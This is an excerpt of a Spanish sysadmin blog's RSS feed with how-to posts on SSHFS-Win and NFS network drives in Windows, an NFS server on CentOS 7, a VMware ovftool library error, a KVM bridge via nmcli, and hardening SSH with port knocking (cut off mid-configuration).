      <link>https://www.igalvan.es/posts/windows-unidad-red-sobre-ssh/</link>
      <pubDate>Tue, 26 Oct 2021 19:13:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-unidad-red-sobre-ssh/</guid>
      <description><![CDATA[<p>Hoy vamos a ver una forma muy práctica de acceder al contenido de un servidor GNU/Linux desde Windows utilizando SSH para mapearlo como si fuera una unidad de red.</p>
<h2 id="instalación">Instalación</h2>
<p>Lo primero es descargar e instalar dos programas en nuestro equipo Windows. Os dejo los enlaces.</p>
<ul>
<li>SSHFS-Win: <a href="https://github.com/billziss-gh/sshfs-win">https://github.com/billziss-gh/sshfs-win</a></li>
<li>WinFsp: <a href="https://github.com/billziss-gh/winfsp">https://github.com/billziss-gh/winfsp</a></li>
</ul>
<p>Son dos paquetes MSI de los de &ldquo;siguiente, siguiente, finalizar&rdquo; así que tampoco vamos a perder el tiempo detallando su instalación.</p>
<h2 id="mapear-el-directorio-personal-de-un-usuario">Mapear el directorio personal de un usuario</h2>
<p>El mapeo se realiza como cualquier unidad de red de Windows con la excepción de que a la hora de mapear la unidad debemos seguir el siguiente formato:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>\\sshfs\&lt;USUARIO&gt;@&lt;MAQUINA&gt;
</span></span></code></pre></div><p><img src="/images/2021/20211026-mapeo-carpeta-personal.png" alt="Mapeo carpeta personal unidad red" title="Mapeo carpeta personal como unidad de red"></p>
<p>Nos pedirá nuestras credenciales y ya está hecho.</p>
<p><img src="/images/2021/20211026-credenciales.png" alt="Credenciales mapeo" title="Credenciales mapeo de red"></p>
<p>En esta captura podemos observar los ficheros que contiene mi carpeta personal en el servidor GNU/Linux.</p>
<p><img src="/images/2021/20211026-explorer-carpeta-personal.png" alt="Mapeo carpeta datos unidad red" title="Mapeo carpeta datos como unidad de red"></p>
<h2 id="mapear-un-directorio-dentro-del-servidor">Mapear un directorio dentro del servidor</h2>
<p>¿Os acordais del montaje NFS que hemos usado en otras publicaciones? Pues es muy fácil mapear directamente ese directorio como una unidad de red. Tan solo hay que cambiar un poco el comando para que siga este formato.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>\\sshfs.r\&lt;USUARIO&gt;@&lt;MAQUINA&gt;\&lt;RUTA&gt;
</span></span></code></pre></div><p><img src="/images/2021/20211026-mapeo-carpeta-datos.png" alt="Mapeo carpeta datos unidad red" title="Mapeo carpeta datos como unidad de red"></p>
<p>Aquí podemos ver el contenido de la carpeta datos dentro del explorador de Windows.</p>
<p><img src="/images/2021/20211026-explorer-datos.png" alt="Carpeta datos en Explorer" title="Carpeta datos en Explorer"></p>
<h2 id="mapear-un-directorio-desde-la-consola-cmd">Mapear un directorio desde la consola CMD</h2>
<p>Pues resulta que también es posible mapear un directorio desde la consola CMD y como esto es algo que me encanta, ahí os dejo un ejemplo.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>C:\Users\IEUser<span style="color:#75715e">&gt;net use X: \\sshfs\ignacio@192.168.2.129</span>
</span></span><span style="display:flex;"><span>The password is invalid for \\sshfs\ignacio@192.168.2.129.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Enter the user name for &#39;sshfs&#39;: ignacio
</span></span><span style="display:flex;"><span>Enter the password for sshfs:
</span></span><span style="display:flex;"><span>The command completed successfully.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>C:\Users\IEUser<span style="color:#75715e">&gt;net use</span>
</span></span><span style="display:flex;"><span>New connections will be remembered.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Status       Local     Remote                    Network
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>-------------------------------------------------------------------------------
</span></span><span style="display:flex;"><span>             X:        \\sshfs\ignacio@192.168.2.129
</span></span><span style="display:flex;"><span>                                                WinFsp.Np
</span></span><span style="display:flex;"><span>             Z:        \\sshfs.r\ignacio@192.168.2.129\datos
</span></span><span style="display:flex;"><span>                                                WinFsp.Np
</span></span><span style="display:flex;"><span>The command completed successfully.
</span></span></code></pre></div><p>Y para eliminarlo, igual de sencillo</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>$ net use X: /delete
</span></span><span style="display:flex;"><span>X: was<span style="color:#75715e"> deleted successfully.</span>
</span></span></code></pre></div><h2 id="más-opciones">Más opciones</h2>
<p>Tiene algunas opciones más como el uso de claves SSH si no quereis usar contraseñas. Lo mejor es que reviseis la documentación en su página web. Pues eso es todo, amigos.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mapear unidad de red cliente NFS en Windows</title>
      <link>https://www.igalvan.es/posts/windows-unidad-red-cliente-nfs/</link>
      <pubDate>Sun, 24 Oct 2021 20:41:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/windows-unidad-red-cliente-nfs/</guid>
      <description><![CDATA[<p>Lo prometido es deuda. En este post os dije que ibamos a hacer algo chulo con el servidor NFS en Windows. Y a eso vamos, vamos a usar una funcionalidad de Windows 10 que pasa desapercibida, el cliente NFS para Windows. En mi caso voy a optar solo por la instalación y configuración mediante consola ya que hacerlo gráficamente no es tan divertido.</p>
<h2 id="instalación">Instalación</h2>
<p>Desde una consola de PowerShell elevada hay que ejecutar el siguiente comando.</p>
<p>{% highlight powershell %}
Enable-WindowsOptionalFeature -Online -FeatureName ClientForNFS-Infrastructure
{% endhighlight %}</p>
<h2 id="montaje-de-solo-lectura">Montaje de solo lectura</h2>
<p>Hay que tener en cuenta que esto no funciona desde la consola de PowerShell.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>mount -o anon \\&lt;IP_SERVIDOR_NFS&gt;\datos Z:
</span></span><span style="display:flex;"><span>Z: is<span style="color:#75715e"> now successfully connected to \\&lt;IP_SERVIDOR_NFS&gt;\datos</span>
</span></span></code></pre></div><h2 id="montaje-de-lecturaescritura">Montaje de lectura/escritura</h2>
<p>Esta parte es bastante engorrosa en Windows. A mí personalmente no me gusta nada y por eso prefiero usar otras alternativas que os mostraré en otra publicación. Pero bueno, para ciertos entornos tiene su utilidad.</p>
<p>Lo primero es usar el comando <code>mount</code> para obtener el UID y GID con el que está montado el recurso NFS.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>mount
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Local    Remote                                 Properties
</span></span><span style="display:flex;"><span>-------------------------------------------------------------------------------
</span></span><span style="display:flex;"><span>Z:       \\<span style="color:#75715e">&lt;IP_SERVIDOR_NFS&gt;\datos              UID=-2, GID=-2</span>
</span></span><span style="display:flex;"><span>                                                rsize=262144, wsize=262144
</span></span><span style="display:flex;"><span>                                                mount=soft, timeout=0.8
</span></span><span style="display:flex;"><span>                                                retry=1, locking=yes
</span></span><span style="display:flex;"><span>                                                fileaccess=755, lang=ANSI
</span></span><span style="display:flex;"><span>                                                casesensitive=no
</span></span><span style="display:flex;"><span>                                                sec=sys
</span></span></code></pre></div><p>Hay que crear dos entradas en el registro de Windows para modificar los UID y GID por defecto. Lo ideal es elegir el UID y GDI de un usuario que ya exista en el servidor NFS y de esa manera creamos los ficheros y carpeta con identificadores ya existentes y no veremos valores númericos al visualizar los directorios desde nuestro Linux.</p>
<p>La primera clave se crea con el siguiente comando.</p>
<p>{% highlight powershell %}
New-ItemProperty HKLM:\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\Default -Name AnonymousUID -Value 1000 -PropertyType &ldquo;DWord&rdquo;</p>
<p>AnonymousUID : 1000
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\De
fault
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion
PSChildName  : Default
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry
{% endhighlight %}</p>
<p>La segunda clave se crea con el siguiente comando.</p>
<p>{% highlight powershell %}
New-ItemProperty HKLM:\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\Default -Name AnonymousGID -Value 105  -PropertyType &ldquo;DWord&rdquo;</p>
<p>AnonymousGID : 1000
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion\De
fault
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ClientForNFS\CurrentVersion
PSChildName  : Default
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry</p>
<p>PS C:\Windows\system32&gt;
{% endhighlight %}</p>
<p>Es necesario reiniciar el equipo para que lea del registro los cambios.</p>
<p>Vamos a ver si esto ha funcionado. Vamos a intentar crear una carpeta llamada <code>folder2</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bat" data-lang="bat"><span style="display:flex;"><span>C:\Users\IEUser<span style="color:#75715e">&gt;z:</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Z:\<span style="color:#75715e">&gt;dir</span>
</span></span><span style="display:flex;"><span> Volume in drive Z has no label.
</span></span><span style="display:flex;"><span> Volume Serial Number is 1835-1B2D
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> Directory of Z:\
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>10/22/2021  01:40 PM    &lt;DIR&gt;          .
</span></span><span style="display:flex;"><span>10/22/2021  01:40 PM    &lt;DIR&gt;          ..
</span></span><span style="display:flex;"><span>10/22/2021  01:23 PM    &lt;DIR&gt;          folder
</span></span><span style="display:flex;"><span>               0 File(s)             62 bytes
</span></span><span style="display:flex;"><span>               3 Dir(s)  37,989,482,496 bytes free
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Z:\<span style="color:#75715e">&gt;mkdir folder2</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Z:\<span style="color:#75715e">&gt;dir</span>
</span></span><span style="display:flex;"><span> Volume in drive Z has no label.
</span></span><span style="display:flex;"><span> Volume Serial Number is 1835-1B2D
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> Directory of Z:\
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>10/22/2021  01:40 PM    &lt;DIR&gt;          .
</span></span><span style="display:flex;"><span>10/22/2021  01:40 PM    &lt;DIR&gt;          ..
</span></span><span style="display:flex;"><span>10/22/2021  01:23 PM    &lt;DIR&gt;          folder
</span></span><span style="display:flex;"><span>10/22/2021  01:40 PM    &lt;DIR&gt;          folder2
</span></span><span style="display:flex;"><span>               0 File(s)             98 bytes
</span></span><span style="display:flex;"><span>               4 Dir(s)  37,989,482,496 bytes free
</span></span></code></pre></div><p>Y ahora vamos a nuestro servidor NFS a ver si realmente existe y con qué propietario y permisos se ha creado.</p>
<p>{% highlight shell %}
[root@centos7 datos]# ll
total 0
drwxr-xr-x. 2 root    root    22 oct 22 21:23 folder
drwxr-xr-x. 2 ignacio ignacio  6 oct 22 21:43 folder2
[root@centos7 datos]#
{% endhighlight %}</p>
<p>Pues eso es todo, amigos.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Servidor NFS en CentOS 7</title>
      <link>https://www.igalvan.es/posts/servidor-nfs-en-centos-7/</link>
      <pubDate>Sun, 17 Oct 2021 18:34:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/servidor-nfs-en-centos-7/</guid>
      <description><![CDATA[<p>Hoy voy a explicar cómo montar un servidor NFS en una máquina con CentOS 7 que luego utilizaré para otra entrada del blog mucho más interesante para los que usen Windows.</p>
<p>Una nota aclaratoria, esto no pretende ser un tutorial sobre cómo exportar volúmenes NFS sino una breve introducción explicativa para apoyar lo que mostraré en la entrada que crearé en breve. 😁</p>
<h2 id="instalación-servicio-nfs">Instalación servicio NFS</h2>
<p>Lo primero que vamos a hacer es instalar los paquetes necesarios para disponer del servicio NFS.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo dnf install nfs-utils
</span></span></code></pre></div><p>Si tenemos habilitado SELinux en el servidor hay que permitir su uso, por lo que hay que ejecutar este comando.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo setsebool -P nfs_export_all_ro<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> nfs_export_all_rw<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>El siguiente paso es abrir los puertos necesarios en el cortafuegos. Esto lo hacemos en dos pasos, el primero sirve para añadir las excepciones del servicio y el segundo para forzar el cortafuegos a recargar la configuración que hemos modificado.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo firewall-cmd --permanent --add-service nfs
</span></span><span style="display:flex;"><span>success
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo firewall-cmd --reload
</span></span><span style="display:flex;"><span>success
</span></span></code></pre></div><p>El siguiente paso es habilitar los servicios para que se inicien con el inicio del servidor.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo systemctl enable rpcbind nfs-server
</span></span><span style="display:flex;"><span>Created symlink from /etc/systemd/system/multi-user.target.wants/nfs-server.service to /usr/lib/systemd/system/nfs-server.service.
</span></span></code></pre></div><p>Y ahora vamos a iniciar los servicios para poder pasar a la parte de configuración.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo systemctl start rpcbind nfs-server
</span></span></code></pre></div><h2 id="configuración-servicio-nfs">Configuración servicio NFS</h2>
<p>El primer paso es crear el directorio que vamos a exportar, en mi caso /datos.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>mkdir /datos
</span></span></code></pre></div><p>Como segundo paso vamos a modificar el fichero exports para configurar una exportación del directorio datos en modo lectura para cualquier usuario. En mi caso lo voy a exportar a cualquier IP porque es un laboratorio. Si vais a montar esto en un entorno más serio, por favor, indicad solo la IP desde la que vais a acceder.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>cat /etc/exports
</span></span><span style="display:flex;"><span>/datos *<span style="color:#f92672">(</span>ro,sync<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>En el siguiente paso vamos a forzar la exportación del nuevo volumen mediante el siguiente comando.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>root@centos7 ignacio<span style="color:#f92672">]</span><span style="color:#75715e"># exportfs -arv&lt;br /&gt;exporting *:/datos&lt;/span&gt;&lt;/p&gt;</span>
</span></span></code></pre></div><p>Por último, vamos a comprobar que el directorio se encuentra correctamente exportado y accesible.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>ignacio@centos7 ~<span style="color:#f92672">]</span>$ sudo exportfs -s
</span></span><span style="display:flex;"><span>/datos *<span style="color:#f92672">(</span>sync,wdelay,hide,no_subtree_check,sec<span style="color:#f92672">=</span>sys,ro,secure,root_squash,no_all_squash<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Bueno y con esto hemos terminado por hoy. 🏁</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Error libnsl en VMware Workstation al importar OVF</title>
      <link>https://www.igalvan.es/posts/error-libnsl-en-vmware-workstation-al/</link>
      <pubDate>Sat, 16 Oct 2021 07:52:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/error-libnsl-en-vmware-workstation-al/</guid>
      <description><![CDATA[<p>Intentando importar el OVF de una de las máquinas virtuales de pruebas de Microsoft en VMware Workstation 16 me encontré con un curioso error. Al intentar abrir el fichero con el procedimiento habitual, en el momento de pulsar el botón &ldquo;Abrir&rdquo; dentro de la ventana de &ldquo;Open Virtual Machines&rdquo;, simplemente no hacia nada.</p>
<p>Al utilizar la consola para ejecutar la herramienta ovftool mostraba un error con la librería libnsl.</p>
<pre tabindex="0"><code>[ignacio@server MSEdge-Win10-VMware]$ ovftool MSEdge-Win10-VMware.ovf &lt;br /&gt;/usr/lib/vmware-ovftool/ovftool.bin: error while loading shared libraries: libnsl.so.1: cannot open shared object file: No such file or directory
</code></pre><p>Solucionarlo es tan sencillo como instalarla y listo.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Crear una interfaz puente para KVM desde nmcli en Fedora 34</title>
      <link>https://www.igalvan.es/posts/crear-una-interfaz-puente-para-kvm/</link>
      <pubDate>Fri, 06 Aug 2021 19:15:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/crear-una-interfaz-puente-para-kvm/</guid>
      <description><![CDATA[<p>En mi equipo personal ahora mismo estoy utilizando Fedora y Virtual Machine Manager para gestionar mis máquinas virtuales sobre KVM. Una de las cosas que más hecho de menos de VirtualBox es la posibilidad de utilizar una interfaz puente para poder asignar una IP de mi red local a una de mis máquinas virtuales. En esta publicación veremos cómo hacerlo.</p>
<p>Doy por entendido que tienes un conocimiento básico de lo qué es una interfaz puente y que conoces el comando nmcli. En caso contrario, busca un poco por Internet e infórmate de si realmente necesitas crear este tipo de interfaz. 😜</p>
<h2 id="crear-la-interfaz-puente">Crear la interfaz puente</h2>
<p>El primer paso es crear la interfaz puente mediante el siguiente comando:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>$ sudo nmcli con add ifname br0 type bridge con-name br0
</span></span><span style="display:flex;"><span>Conexión «br0» <span style="color:#f92672">(</span>9a659c12-715f-4186-add1-fa92a1b7fd25<span style="color:#f92672">)</span> añadida con éxito.
</span></span></code></pre></div><p>Ahora tenemos que crear la interfaz esclava que vincularemos con nuestro puente</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>$ sudo nmcli con add type bridge-slave ifname enp8s0 master br0
</span></span><span style="display:flex;"><span>Conexión «bridge-slave-enp8s0» <span style="color:#f92672">(</span>5009e0de-0e28-448c-b1b4-91dd4053232e<span style="color:#f92672">)</span> añadida con éxito.
</span></span></code></pre></div><p>En mi caso voy a desactivar spanning tree (STP) porque no me hace falta.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>$ sudo nmcli con modify br0 bridge.stp no
</span></span></code></pre></div><p>Verificamos que todo está configurado como queremos.</p>
<pre tabindex="0"><code>$ nmcli -f bridge con show br0
bridge.mac-address:                     -- 
bridge.stp:                             no
bridge.priority:                        32768 
bridge.forward-delay:                   15 
bridge.hello-time:                      2 
bridge.max-age:                         20 
bridge.ageing-time:                     300 
bridge.group-forward-mask:              0 
bridge.multicast-snooping:              sí 
bridge.vlan-filtering:                  no 
bridge.vlan-default-pvid:               1 
bridge.vlans:
</code></pre><p>Como yo tengo activa la interfaz por defecto que genera Fedora, tengo que desactivarla para poder utilizar la nueva interfaz puente.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>$ sudo nmcli con down <span style="color:#e6db74">&#34;Conexión cableada 1&#34;</span>
</span></span><span style="display:flex;"><span>$ sudo nmcli con up br0
</span></span><span style="display:flex;"><span>$ nmcli con show
</span></span><span style="display:flex;"><span>NAME     UUID                                  TYPE      DEVICE  
</span></span><span style="display:flex;"><span>br0      9a659c12-715f-4186-add1-fa92a1b7fd25  bridge    br0     
</span></span><span style="display:flex;"><span>virbr0   b994e990-6364-4fa8-afaf-3016881b4cfb  bridge    virbr0  
</span></span><span style="display:flex;"><span>enp8s0   5009e0de-0e28-448c-b1b4-91dd4053232e  ethernet  enp8s0
</span></span></code></pre></div><h2 id="crear-la-interfaz-en-vmm">Crear la interfaz en VMM</h2>
<p>Hay que crear el siguiente fichero XML que nos permitirá definir la interfaz puente en VMM. En mi caso lo he ubicado en la carpeta <code>/tmp</code> y lo he llamado <code>br0.xml</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-xml" data-lang="xml"><span style="display:flex;"><span><span style="color:#f92672">&lt;network&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;name&gt;</span>br0<span style="color:#f92672">&lt;/name&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;forward</span> <span style="color:#a6e22e">mode=</span><span style="color:#e6db74">&#34;bridge&#34;</span><span style="color:#f92672">/&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&lt;bridge</span> <span style="color:#a6e22e">name=</span><span style="color:#e6db74">&#34;br0&#34;</span> <span style="color:#f92672">/&gt;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;/network&gt;</span>
</span></span></code></pre></div><p>Ahora ejecutamos el siguiente comando para importar el fichero XML y que se genere la interfaz puente.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>$ sudo virsh net-define /tmp/br0.xml
</span></span><span style="display:flex;"><span>$ sudo virsh net-start br0
</span></span></code></pre></div><p>La red br0 se ha iniciado</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>$ sudo virsh net-autostart br0
</span></span><span style="display:flex;"><span>La red br0 ha sido marcada para iniciarse automáticamente 
</span></span><span style="display:flex;"><span>$ sudo virsh net-list --all 
</span></span><span style="display:flex;"><span>Nombre   Estado   Inicio automático   Persistente 
</span></span><span style="display:flex;"><span>---------------------------------------------------- 
</span></span><span style="display:flex;"><span>br0      activo   si                  si 
</span></span><span style="display:flex;"><span>nat      activo   si                  si
</span></span></code></pre></div><p>Si abrimos la consola de VMM ya podemos ver que se ha creado la nueva interfaz y está lista para ser usada con nuestras máquinas virtuales.</p>
<p><img src="/images/2021/20210806-network-manager.png" alt="image-20210806-network-manager"></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Proteger SSH mediante Port Knocking</title>
      <link>https://www.igalvan.es/posts/proteger-ssh-mediante-port-knocking/</link>
      <pubDate>Sun, 01 Aug 2021 21:04:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/proteger-ssh-mediante-port-knocking/</guid>
      <description><![CDATA[<p>Hoy vamos a ver cómo ocultar un servicio que tengamos publicado en Internet aprovechándonos de una técnica conocida como Port Knocking. En nuestro caso lo haremos con el servicio SSH.</p>
<h2 id="máquina-servidor">Máquina servidor</h2>
<p>Lo primero es instalar el paquete de EPEL para posteriormente instalar el paquete knock-server. También es necesario instalar libpcap.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knockd ~<span style="color:#f92672">]</span><span style="color:#75715e"># yum install libpcap</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knockd ~<span style="color:#f92672">]</span><span style="color:#75715e"># yum install epel-release</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knockd ~<span style="color:#f92672">]</span><span style="color:#75715e"># yum install knock-server</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>El siguiente paso es eliminar de nftables la regla que permite las conexiones SSH remotas mediante el siguiente comando. Ten en cuenta que en mi instalación se usa la zona por defecto llamada public.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knockd ~<span style="color:#f92672">]</span><span style="color:#75715e"># firewall-cmd --zone=public --remove-service=ssh --permanent</span>
</span></span><span style="display:flex;"><span>success
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>root@knockd ~<span style="color:#f92672">]</span><span style="color:#75715e"># firewall-cmd --reload</span>
</span></span></code></pre></div><p>El siguiente paso es modificar el fichero /etc/knockd.conf y dejarlo con el siguiente contenido. Por favor, <strong>cambiad los puertos a otra secuencia</strong>. 😜</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#f92672">[</span>options<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>        UseSyslog
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>opencloseSSH<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>        sequence      <span style="color:#f92672">=</span> 51234:udp,55678:tcp,59124:udp
</span></span><span style="display:flex;"><span>        seq_timeout   <span style="color:#f92672">=</span> <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>        tcpflags      <span style="color:#f92672">=</span> syn,ack
</span></span><span style="display:flex;"><span>        start_command <span style="color:#f92672">=</span> /bin/firewall-cmd --zone<span style="color:#f92672">=</span>public --add-rich-rule <span style="color:#e6db74">&#34;rule family=&#34;</span>ipv4<span style="color:#e6db74">&#34; source address=&#34;</span>%IP%<span style="color:#e6db74">&#34; service name=&#34;</span>ssh<span style="color:#e6db74">&#34; accept&#34;</span>
</span></span><span style="display:flex;"><span>        cmd_timeout   <span style="color:#f92672">=</span> <span style="color:#ae81ff">10</span>
